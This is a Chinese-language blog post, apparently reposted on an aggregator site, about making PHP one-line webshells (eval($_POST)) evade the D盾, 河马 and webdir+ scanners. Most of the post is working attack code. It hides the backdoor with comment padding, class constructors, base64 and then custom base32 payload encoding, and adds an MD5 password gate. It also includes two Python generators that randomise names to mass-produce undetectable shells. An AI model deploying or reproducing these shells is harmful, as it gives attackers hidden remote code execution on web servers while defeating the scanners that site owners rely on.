0x00：簡介

此篇只討論php，其實(shí)原理是相同的，本文的思路依然適用于其他語言
由于php7.1以后assert不能拆分了，所以此篇不使用assert函數(shù)作為核心，使用適用性更廣的eval。

免殺順序依次為D盾 河馬 webdir+

0x01：探究免殺

免殺D盾

首先我們需要了解免殺的原理，免殺其實(shí)就是繞過殺軟的規(guī)則，而規(guī)則對我們來說是不透明的，但是可以根據(jù)fuzz探知個大概。

首先請出我們的一句話木馬：

<?php @eval($_POST('a'));?>

無論如何混淆webshell，我們期望最終得到的邏輯依然是這條代碼，所以答案知道了，想辦法混淆就行了。

經(jīng)過對D盾的探測，可以知道，它對函數(shù)的檢測其實(shí)是比較粗糙的，比如我們構(gòu)造一個函數(shù)，讓其返回值拼接為

eval($_POST['a']) <?phpfunction x() {return $_POST['a'];}eval(x()); ?>

D盾掃一下

被殺了，顯然D盾并沒有給出我們?yōu)槭裁催@個會被殺，只說是已知后門，這里我們測試一下到底是什么東西被規(guī)則殺掉了。

首先，無論如何更改函數(shù)名，都會被殺掉，所以和函數(shù)名沒關(guān)系，然后就是eval內(nèi)的參數(shù)了，測試后發(fā)現(xiàn)，只要拼接成eval($_POST['a'])就會被殺，因此我們避免語句直接拼接為這樣即可。

如何避免直接拼接呢 當(dāng)然是往中間加料了 加一些既不會破壞語法又能起到隔離作用的東西，什么東西可以做到這樣呢？當(dāng)然就是注釋了

比如這樣的：

<?phpfunction x() {return "/*sasas23123*/".$_POST['a']."/*sdfw3123*/";}eval(x()); ?>

這里用兩段注釋在"eval("與"$_POST"之間起到了隔離的作用，因此繞過了直接拼接這個規(guī)則，D盾繼續(xù)殺一下

已經(jīng)免殺成功，再看一下能否使用

既然如此，我們的核心繞過思路就是利用注釋了，為了去除特征，必不可少的就是隨機(jī)性了

?

使用函數(shù)返回值與eval拼接只是權(quán)宜之計(jì)，畢竟也是一條規(guī)則就能夠被干掉的。

所以我們這里使用類和構(gòu)造函數(shù)來替代主動調(diào)用函數(shù)，

<?php class x {function __construct(){ @eval("/*sasas23123*/".$_POST['a']."/*sdfw3123*/");}} new x();?>

改到這里，我不禁想 如果D盾發(fā)狠把".$_POST['a']."當(dāng)獨(dú)立規(guī)則，那豈不是也歇菜，所以，我決定使用base64編碼將"$_POST['a']"轉(zhuǎn)化一下

<?php class x {public $payload = null;public $decode_payload = null;function __construct(){ $this->payload='ZXZhbCgkX1BPU1RbYV0pOw==';$this->decode_payload = @base64_decode( $this->payload );@eval("/*sasas23123*/".$this->decode_payload."/*sdfw3123*/");}} new x();?>

到現(xiàn)在為止，模板確認(rèn)

后面就是寫輪子了，至于輪子原理也很簡單，就是將可以修改特征的參數(shù)名使用隨機(jī)數(shù)填充，比如類名、public變量名、用于混淆的注釋字符等。
代碼如下：

import random#author: pureqh #github: https://github.com/pureqh/webshellshell = '''<?php class {0}{3}public ${1} = null;public ${2} = null;function __construct(){3}$this->{1}='ZXZhbCgkX1BPU1RbYV0pOw==';$this->{2} = @base64_decode( $this->{1} );@eval({5}.$this->{2}.{5});{4}{4} new {0}(); ?>'''def random_keys(len):str = '`~-=!@#$%^&_+?<>|:[]abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'return ''.join(random.sample(str,len))def random_name(len):str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'return ''.join(random.sample(str,len)) def build_webshell():className = random_name(4)parameter1 = random_name(5)parameter2 = random_name(6)lef = '''{'''rig = '''}'''disrupt = "\"/*"+random_keys(7)+"*/\""shellc = shell.format(className,parameter1,parameter2,lef,rig,disrupt)return shellcif __name__ == '__main__':print (build_webshell())

?

免殺河馬

首先我們拿出之前的樣本：

<?php class YHUV{public $BSFRM = null;public $YVMQFW = null;function __construct(){$this->BSFRM='ZXZhbCgkX1BPU1RbYV0pOw==';$this->YVMQFW = @base64_decode( $this->BSFRM );@eval("/*rEgV_Cd*/".$this->YVMQFW."/*rEgV_Cd*/");}} new YHUV(); ?>

直接拿去河馬查殺一下，

它很可能通過拼接得到了"eval($_POST[xxx]);"，所以認(rèn)定為木馬，那我加一層認(rèn)證如何

<?php class BTAG {public $QOMYW = null;public $XGTCPL = null;public $YIOXAL = null;function __construct() {if (md5($_GET["pass"]) == "df24bfd1325f82ba5fd3d3be2450096e"){$this->QOMYW = 'ZXZhbCgkX1BPU';$this->YIOXAL = '1RbYV0pOw==';$this->XGTCPL = @base64_decode($this->QOMYW.$this->YIOXAL);@eval("/*#`|W$~Q*/".$this->XGTCPL."/*#`|W$~Q*/");}}} new BTAG(); ?>

這個我是真沒想到...

免殺webdir+

官方說它會拿沙盒跑

我們拿繞過河馬的馬跑一下，這里的檢測速度之所以比較慢就是因?yàn)樗谂苌澈?#xff0c;這種方式確實(shí)比傳統(tǒng)的查殺工具難搞很多，但是它并不完美。

由于eval依然無法動搖，所以我依舊從"$_POST['a']"下手，首先這串字符編碼后是過不去webdir+的，但是不編碼也過不去，我猜測可能是沙盒在模擬運(yùn)行的時候拼接出了eval($_POST['a]),導(dǎo)致被殺，那我使用md5做密鑰它總跑不出來吧。修改代碼如下:

<?php class YHUV{public $BSFRM = null;public $YNMQFW = null;function __construct() {if(md5($_GET["pass"])=="df24bfd1325f82ba5fd3d3be2450096e"){$this->BSFRM=$_POST['a'];@eval("/*rEgV_Cd*/".$this->BSFRM."/*rEgV_Cd*/");}}} new YHUV(); ?>

還是被殺了，我反而很高興，那這也說明一個問題，你并沒有順利執(zhí)行過我的馬，那說明我eval()里的東西一直都是安全的，那么不安全的肯定就是"$_POST['a']"了，這個怎么解決呢？

經(jīng)過大量測試 我發(fā)現(xiàn)了一個事情 base64不行了

base64不行了怎么辦？我直接用base32，php沒有自帶的base32？那就自己寫

function base32_encode($input) {$BASE32_ALPHABET = 'abcdefghijklmnopqrstuvwexyz234567';$output = '';$v = 0;$vbits = 0;for ($i = 0, $j = strlen($input); $i < $j; $i++) {$v <<= 8;$v += ord($input[$i]);$vbits += 8;while ($vbits >= 5) {$vbits -= 5;$output .= $BASE32_ALPHABET[$v >> $vbits];$v &= ((1 << $vbits) - 1);}}if ($vbits > 0) {$v <<= (5 - $vbits);$output .= $BASE32_ALPHABET[$v];}return $output; }function base32_decode($input) {$output = '';$v = 0;$vbits = 0;for ($i = 0, $j = strlen($input); $i < $j; $i++) {$v <<= 5;if ($input[$i] >= 'a' && $input[$i] <= 'z') {$v += (ord($input[$i]) - 97);} elseif ($input[$i] >= '2' && $input[$i] <= '7') {$v += (24 + $input[$i]);} else {exit(1);}$vbits += 5;while ($vbits >= 8) {$vbits -= 8;$output .= chr($v >> $vbits);$v &= ((1 << $vbits) - 1);}}return $output; }

shell如下，直接使用base32處理"eval($_POST[zero]);"

<?php class ZQIH{public $a = null;public $b = null;public $c = null;function __construct(){if(md5($_GET["pass"])=="df24bfd1325f82ba5fd3d3be2450096e"){$this->a = 'mv3gc3bierpvat2tkrnxuzlsn5ossoy';$this->LGZOJH = @base32_decode($this->a);@eval/*sopupi3240-=*/("/*iSAC[FH*/".$this->LGZOJH."/*iSAC[FH*/");}}} new ZQIH();function base32_encode($input) {$BASE32_ALPHABET = 'abcdefghijklmnopqrstuvwxyz234567';$output = '';$v = 0;$vbits = 0;for ($i = 0, $j = strlen($input); $i < $j; $i++) {$v <<= 8;$v += ord($input[$i]);$vbits += 8;while ($vbits >= 5) {$vbits -= 5;$output .= $BASE32_ALPHABET[$v >> $vbits];$v &= ((1 << $vbits) - 1);}}if ($vbits > 0) {$v <<= (5 - $vbits);$output .= $BASE32_ALPHABET[$v];}return $output; }function base32_decode($input) {$output = '';$v = 0;$vbits = 0;for ($i = 0, $j = strlen($input); $i < $j; $i++) {$v <<= 5;if ($input[$i] >= 'a' && $input[$i] <= 'z') {$v += (ord($input[$i]) - 97);} elseif ($input[$i] >= '2' && $input[$i] <= '7') {$v += (24 + $input[$i]);} else {exit(1);}$vbits += 5;while ($vbits >= 8) {$vbits -= 8;$output .= chr($v >> $vbits);$v &= ((1 << $vbits) - 1);}}return $output; } ?>

繼續(xù)查殺：

能否運(yùn)行：

至此，我們似乎找到了盲點(diǎn)，以后直接自己寫加密完事了。可惜一句話木馬也被寫成一段話木馬了。。。不過在滲透測試過程中完全可以將其拆分為多個文件互相調(diào)用。

0x02：批量代碼

同樣為了減少特征
代碼如下

import random#author: pureqh #github: https://github.com/pureqh/webshell #use:GET:http://url?pass=pureqh POST:zeroshell = '''<?php class {0}{1}public ${2} = null;public ${3} = null;function __construct(){1}if(md5($_GET["pass"])=="df24bfd1325f82ba5fd3d3be2450096e"){1}$this->{2} = 'mv3gc3bierpvat2tkrnxuzlsn5ossoy';$this->{3} = @{9}($this->{2});@eval({5}.$this->{3}.{5});{4}{4}{4} new {0}(); function {6}(${7}){1}$BASE32_ALPHABET = 'abcdefghijklmnopqrstuvwxyz234567';${8} = '';$v = 0;$vbits = 0;for ($i = 0, $j = strlen(${7}); $i < $j; $i++){1}$v <<= 8;$v += ord(${7}[$i]);$vbits += 8;while ($vbits >= 5) {1}$vbits -= 5;${8} .= $BASE32_ALPHABET[$v >> $vbits];$v &= ((1 << $vbits) - 1);{4}{4}if ($vbits > 0){1}$v <<= (5 - $vbits);${8} .= $BASE32_ALPHABET[$v];{4}return ${8};{4} function {9}(${7}){1}${8} = '';$v = 0;$vbits = 0;for ($i = 0, $j = strlen(${7}); $i < $j; $i++){1}$v <<= 5;if (${7}[$i] >= 'a' && ${7}[$i] <= 'z'){1}$v += (ord(${7}[$i]) - 97);{4} elseif (${7}[$i] >= '2' && ${7}[$i] <= '7') {1}$v += (24 + ${7}[$i]);{4} else {1}exit(1);{4}$vbits += 5;while ($vbits >= 8){1}$vbits -= 8;${8} .= chr($v >> $vbits);$v &= ((1 << $vbits) - 1);{4}{4}return ${8};{4} ?>'''def random_keys(len):str = '`~-=!@#$%^&_+?<>|:[]abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'return ''.join(random.sample(str,len))def random_name(len):str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'return ''.join(random.sample(str, len))def build_webshell():className = random_name(4)lef = '''{'''parameter1 = random_name(4)parameter2 = random_name(4)rig = '''}'''disrupt = "\"/*"+random_keys(7)+"*/\""fun1 = random_name(4)fun1_vul = random_name(4)fun1_ret = random_name(4)fun2 = random_name(4)shellc = shell.format(className, lef, parameter1, parameter2, rig, disrupt, fun1, fun1_vul, fun1_ret, fun2)return shellcif __name__ == '__main__':print (build_webshell())

?

總結(jié)

以上是生活随笔為你收集整理的利用注释及自定义加密免杀Webshell的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。